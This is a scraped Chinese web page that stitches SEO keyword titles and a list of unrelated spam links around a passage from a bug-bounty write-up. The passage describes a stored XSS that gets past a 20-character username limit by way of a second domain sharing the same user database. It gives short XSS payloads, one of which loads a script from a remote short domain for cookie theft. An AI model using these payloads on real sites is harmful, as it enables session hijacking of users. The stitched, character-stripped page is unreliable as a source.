当前位置: 首页 > news >正文

商标查询网站怎么做php 手机网站

商标查询网站怎么做,php 手机网站,株洲论坛,wordpress shift+enter大家好#xff0c;这是我编写的第一篇文章#xff0c;之所以会分享这个故事#xff0c;是因为我花了几个晚上的时间#xff0c;终于找到了解决某个问题的方法。故事如下#xff1a; 几个月前#xff0c;我被邀请参加一个非公共的漏洞悬赏项目#xff0c;在初期发现了一些… 大家好这是我编写的第一篇文章之所以会分享这个故事是因为我花了几个晚上的时间终于找到了解决某个问题的方法。故事如下 几个月前我被邀请参加一个非公共的漏洞悬赏项目在初期发现了一些漏洞后就再无收获。 而在最后5天里出于对金钱的渴望我告诉自己必须在整个项目结束之前再找到一些漏洞因此我又从头开始梳理整个目标。 这个目标是一个大型的社交网络而转折就发生在我去创建一个新的帐户时。 当我在用户名处输入一个XSS的payload时特殊字符: :’();?全不能输入而且长度限制为20个字符。 此时我没有太好的办法只能去寻找其他漏洞。 而当我访问目标范围内的第二个域名试图用我的电子邮件注册新帐户时被告知用户已经注册请登录。看来这两个网站使用的是同一个数据库的用户数据那么我可以借这个网站插入XSS么 我很快进入到“个人资料”页面尝试编辑我的用户名。是的的确没有了敏感字符限制 但是这个长度还是被限制在20个字符以内。 我首先输入一个简单的payload来确认XSS的存在svg/onloadalert()这个长度为20个字符。 输入并保存后我转向第一个网站并成功在“个人资料”页面发现了弹框 接下来我开始探究如何窃取cookie因为危害越大奖励越高。 不过由于无法绕过长度限制所以如何才能用小于20个字符的XSS来窃取cookiexsshunter工具的确很有用但payload都太长了所以我花费了很久的时间不停寻找新方法。48小时之后我发现了这条来自2016年的推特其中的payload的确很短来自0x6D6172696F script/src//⑭.₨只有18个字符。其中₨代表印度卢比这是1个字符而不是2个字符而⑭也是类似的效果。当你访问把这个url粘贴到浏览器去访问时会发现如下情形
http://www.w-s-a.com/news/391860/

相关文章:

  • 一条龙做网站旅游网页设计模板图凡科
  • 中山网站建设哪家便宜在中国做外国网站怎么收钱
  • 网站优化大计孝感注册公司
  • 设计接单app平台有哪些在线网站seo诊断
  • 兰州网站建设推广现代营销手段有哪些
  • 郴州网站seo优化网络安全哪个培训班比较好
  • 做网站需要记哪些代码企业网站建设思路
  • 重庆自助建站模板网络服务器配置与管理
  • 外贸网站怎样做小程序买量平台
  • 中山精品网站建设机构海外留学网站建设方案
  • 长春网站建设工作如何取消wordpress页脚
  • 忻府网站建设排名网络管理系统官网
  • 张家港外贸网站建设国医堂网站平台建设
  • 水冶那里有做网站的对于网站链接优化有哪些建议
  • 宝安中心地铁站是几号线化妆品网站做的好的
  • 海宁营销型网站设计企业融资是什么意思
  • 淘宝客做网站要钱吗网站开发试题库
  • 10g空间网站做视频网站网站建设找超速云
  • 一元购网站怎么做企业网站源码cms
  • 域名不变 网站改版临沂企业网站建站模板
  • 天河网站建设信科网络外包公司和公司直招哪个好
  • 网站制作哈尔滨聊天系统源码
  • 网站建设朋友圈素材青白江建设网站
  • 红酒网站设计软件设计文档
  • 如何创建网站目录网站申请支付宝接口
  • 网站做区块链然后往里面投钱品牌设计公司收费标准
  • 2022互联网+创新创业项目呼和浩特企业网站排名优化
  • 电子商务类网站建设山西自助建站系统怎么用
  • odoo做网站网站设置专栏有什么好处
  • 局域网内个人网站建设查询企业的网站有哪些